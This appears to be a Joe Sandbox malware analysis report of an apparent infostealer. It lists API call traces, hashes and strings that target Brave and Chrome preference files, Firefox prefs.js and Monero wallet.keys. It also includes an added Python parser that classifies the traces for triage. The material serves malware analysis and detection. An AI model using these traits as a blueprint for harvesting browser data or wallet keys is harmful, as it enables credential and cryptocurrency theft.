                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 878bd66600b8741c859a87316c19161bae3af40e0f882b3851d79f66e351173f
                                  • Instruction ID: 9105b14cdf007c8e0d9fb932ec0fceee54df9358e805588ffca6d7e090b371bf
                                  • Opcode Fuzzy Hash: 878bd66600b8741c859a87316c19161bae3af40e0f882b3851d79f66e351173f
                                  • Instruction Fuzzy Hash: 15426572910118FBDB15FB74EC9AEED737DAF48300F404568F50696181EE38AB49CB96
                                  APIs
                                  • wsprintfA.USER32 ref: 0072492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                  • StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                  • StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00724B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 890499440a7b517e1196c1a7aa592bda45fd61d1c90f2eadac5b1f42b3f440df
                                  • Instruction ID: 9d23879d6003dbc1c913b10b8cbaf82d36b8118aefcf6d923fdd12ec4f8a389a
                                  • Opcode Fuzzy Hash: 890499440a7b517e1196c1a7aa592bda45fd61d1c90f2eadac5b1f42b3f440df
                                  • Instruction Fuzzy Hash: 6D617CB1910218ABCB20EFA1EC49FEE737CBB48701F044688F64996141EB75EB85CF95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00724580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00724587
                                  • wsprintfA.USER32 ref: 007245A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007245BD
                                  • StrCmpCA.SHLWAPI(?,00730FC4), ref: 007245EB
                                  • StrCmpCA.SHLWAPI(?,00730FC8), ref: 00724601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0072468B
                                  • FindClose.KERNEL32(000000FF), ref: 007246A0
                                  • lstrcat.KERNEL32(?,0122F5F8), ref: 007246C5
                                  • lstrcat.KERNEL32(?,0122E920), ref: 007246D8
                                  • lstrlen.KERNEL32(?), ref: 007246E5
                                  • lstrlen.KERNEL32(?), ref: 007246F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 7d62604768ddda205e11ef0d55ba29cbd77d7f93f11537e5de58029e11a78f72
                                  • Instruction ID: df83cf7ac8ead0ecb019921f2828da2fde45c1789fce89386e740b57ea353f88
                                  • Opcode Fuzzy Hash: 7d62604768ddda205e11ef0d55ba29cbd77d7f93f11537e5de58029e11a78f72
                                  • Instruction Fuzzy Hash: CC5188B1914318ABCB60EB71DC89FED737CAB58301F404688F74996190EB799B84CF96
                                  APIs
                                  • wsprintfA.USER32 ref: 00723EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00723EDA
                                  • StrCmpCA.SHLWAPI(?,00730FAC), ref: 00723F08
                                  • StrCmpCA.SHLWAPI(?,00730FB0), ref: 00723F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0072406C
                                  • FindClose.KERNEL32(000000FF), ref: 00724081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 4b3ffd29a03d2ef36483cdaaaa163b4f745e8835cb9ee67c99cd0ae03593514b
                                  • Instruction ID: 2a118dd2d309945af9e1946564c11af726f260825d8674189b73b926ff7aa207
                                  • Opcode Fuzzy Hash: 4b3ffd29a03d2ef36483cdaaaa163b4f745e8835cb9ee67c99cd0ae03593514b
                                  • Instruction Fuzzy Hash: 035148B2914218EBCB24EBB4DC89EEE737CBB44301F404688B75996041DB79AB858F95
                                  APIs
                                  • wsprintfA.USER32 ref: 0071ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071ED55
                                  • StrCmpCA.SHLWAPI(?,00731538), ref: 0071EDAB
                                  • StrCmpCA.SHLWAPI(?,0073153C), ref: 0071EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0071F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 1a1dc71965b411150ecea7cc79fb89ac09601cfbc75c4071c6322bc97771beb9
                                  • Instruction ID: 5f12765ac5eaf32ffcf577a85fd9bd6882dd70b20b24b55c91c5749bbc8e10dd
                                  • Opcode Fuzzy Hash: 1a1dc71965b411150ecea7cc79fb89ac09601cfbc75c4071c6322bc97771beb9
                                  • Instruction Fuzzy Hash: 47E1E371911128EBEB55FB60EC56EEE7378AF54300F4045A9F50A62092EE386F8ACF51
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007315B8,00730D96), ref: 0071F71E
                                  • StrCmpCA.SHLWAPI(?,007315BC), ref: 0071F76F
                                  • StrCmpCA.SHLWAPI(?,007315C0), ref: 0071F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0071FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: acb33f27f705413a7cc501d6b1968beea46f77dc2db0208fb1ec83af1dbfa275
                                  • Instruction ID: 34cadb3299d684dfb58e52288ccc0c8e434d3e8e8cd8439834884ba4b802dd5e
                                  • Opcode Fuzzy Hash: acb33f27f705413a7cc501d6b1968beea46f77dc2db0208fb1ec83af1dbfa275
                                  • Instruction Fuzzy Hash: 8DB14971910114EBDB24FF64EC5AEED7379AF54300F4085A8E50A97192EF386B49CF92
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0073510C,?,?,?,007351B4,?,?,00000000,?,00000000), ref: 00711923
                                  • StrCmpCA.SHLWAPI(?,0073525C), ref: 00711973
                                  • StrCmpCA.SHLWAPI(?,00735304), ref: 00711989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00711D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00711DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00711E20
                                  • FindClose.KERNEL32(000000FF), ref: 00711E32
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: c03b40712af9a3c730478f80a00d1fd5e60c1cb2336deeb278658f037b4c7cdd
                                  • Instruction ID: 0ae787c2bb13c9d403437392a984ef3657d507bc99dc4f4e6b0cec679ecd3bcd
                                  • Opcode Fuzzy Hash: c03b40712af9a3c730478f80a00d1fd5e60c1cb2336deeb278658f037b4c7cdd
                                  • Instruction Fuzzy Hash: D612E371910128EBDB19FB60EC9AEEE7378AF54300F4045A9F54666091EF386F89CF91
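                                   The function panels in this part of the report repeat one primitive: wsprintfA builds a "%s\*" or "%s\*.*" mask, FindFirstFileA opens the enumeration, two StrCmpCA calls against adjacent string constants follow immediately (consistent with the usual "." and ".." skip), and FindNextFileA/FindClose close the loop. The routine whose first call is at ref 00711923 adds CopyFileA and DeleteFileA inside that loop (enumerate, copy out, remove), and its subcalls reference \Monero\wallet.keys, while a sibling routine references prefs.js. The Python parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads panels in the report's own "APIs" notation, separates a function's direct calls from the "Part of subcall function" lines, and labels each function by that pattern. The two sample panels are copied from the entries above; the category names and the dot-skip interpretation are the example's own assumptions.

```python
"""Group a Joe Sandbox function panel's API trace into a behavioural profile.

Added example; not part of the Joe Sandbox report or its IDA plugin. It parses
the report's own 'APIs' notation, e.g.
    • FindFirstFileA.KERNEL32(?,?), ref: 00723EDA
    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_WORD = re.compile(r"[0-9A-F]{8}")
WALK_CORE = {"FindFirstFileA", "FindNextFileA", "FindClose"}
GRAB_APIS = {"CopyFileA", "DeleteFileA"}   # labels are this example's assumption


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    callee: Optional[str]   # set when the report attributes the call to a callee


@dataclass
class FunctionProfile:
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def direct(self) -> List[ApiCall]:
        """Calls made by the function itself, excluding 'Part of subcall' lines."""
        return [c for c in self.calls if c.callee is None]

    def classify(self) -> str:
        apis = {c.api for c in self.direct}
        if not WALK_CORE <= apis:
            return "other"
        if apis & GRAB_APIS:
            return "directory-walk+file-grab"
        # Assumption: two StrCmpCA calls between FindFirstFileA and FindNextFileA
        # are the '.' / '..' skip of a full directory walk.
        strcmp = sum(1 for c in self.direct if c.api == "StrCmpCA")
        return "directory-walk" if strcmp >= 2 else "directory-walk?"

    def referenced_strings(self) -> List[str]:
        """Argument tokens that are neither '?' nor 8-digit hex: literal masks and paths."""
        found = set()
        for c in self.calls:
            for tok in c.args:
                if tok and tok != "?" and not HEX_WORD.fullmatch(tok):
                    found.add(tok)
        return sorted(found)


def parse_function(panel: str) -> FunctionProfile:
    """Parse the 'APIs' lines of one panel; headings and blank lines are ignored."""
    prof = FunctionProfile()
    for line in panel.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        prof.calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"),
            args=args.split(",") if args is not None else [],
            ref=int(m.group("ref"), 16), callee=m.group("callee"),
        ))
    return prof


def summarize(panels: List[str]) -> dict:
    """Map the address of each panel's first direct call to its classification."""
    out = {}
    for p in panels:
        prof = parse_function(p)
        if prof.direct:
            out[f"{prof.direct[0].ref:08X}"] = prof.classify()
    return out


# Sample panels copied from the report entries above.
WALK_PANEL = r"""
APIs
• wsprintfA.USER32 ref: 00723EC3
• FindFirstFileA.KERNEL32(?,?), ref: 00723EDA
• StrCmpCA.SHLWAPI(?,00730FAC), ref: 00723F08
• StrCmpCA.SHLWAPI(?,00730FB0), ref: 00723F1E
• FindNextFileA.KERNEL32(000000FF,?), ref: 0072406C
• FindClose.KERNEL32(000000FF), ref: 00724081
"""

GRAB_PANEL = r"""
APIs
  • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0073510C,?,?,?,007351B4,?,?,00000000,?,00000000), ref: 00711923
• StrCmpCA.SHLWAPI(?,0073525C), ref: 00711973
• StrCmpCA.SHLWAPI(?,00735304), ref: 00711989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00711D40
• DeleteFileA.KERNEL32(00000000), ref: 00711DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00711E20
• FindClose.KERNEL32(000000FF), ref: 00711E32
  • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
  • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
  • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
  • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
  • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
  • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
"""

if __name__ == "__main__":
    for addr, kind in summarize([WALK_PANEL, GRAB_PANEL]).items():
        print(addr, kind)
    print(parse_function(GRAB_PANEL).referenced_strings())
```

                                   Subcall lines are kept but not counted toward the caller's own API set, so a helper that does the string building does not make every caller look like a path-construction routine; the literal paths those helpers carry (here \Monero\wallet.keys) are still surfaced by referenced_strings() as triage hints.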
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00730C2E), ref: 0071DE5E
                                  • StrCmpCA.SHLWAPI(?,007314C8), ref: 0071DEAE
                                  • StrCmpCA.SHLWAPI(?,007314CC), ref: 0071DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0071E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: f63c9fc101ad4313fecece51b009441207d978c0df51638e7298b4516db18d70
                                  • Instruction ID: 639e89d1b168b5b3ce83f4afea08daabaf2c5b6040af56539572daa2a59d0213
                                  • Opcode Fuzzy Hash: f63c9fc101ad4313fecece51b009441207d978c0df51638e7298b4516db18d70
                                  • Instruction Fuzzy Hash: 6FF18171814128EBDB16EB60DC99EEE7378BF58300F8045A9F50A62091EF386F89CF55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *$!%~g$!<gn$E=0c$Jk*$ZNl|$`1?v$bMy$dN d$d[;+
                                  • API String ID: 0-2575394991
                                  • Opcode ID: 95d3e703b5034bc57ec4bf572588eb79c6e229ded0936f720eecedf2594e9da3
                                  • Instruction ID: 2aa072943c16b5aa21ccc4722d967ff3a17e91659d32b7e438b062cd8be6645e
                                  • Opcode Fuzzy Hash: 95d3e703b5034bc57ec4bf572588eb79c6e229ded0936f720eecedf2594e9da3
                                  • Instruction Fuzzy Hash: C0B207F3A0C204AFE304AE2DEC8567AB7E9EF94760F16493DEAC5C3744E63558018697
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007314B0,00730C2A), ref: 0071DAEB
                                  • StrCmpCA.SHLWAPI(?,007314B4), ref: 0071DB33
                                  • StrCmpCA.SHLWAPI(?,007314B8), ref: 0071DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0071DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
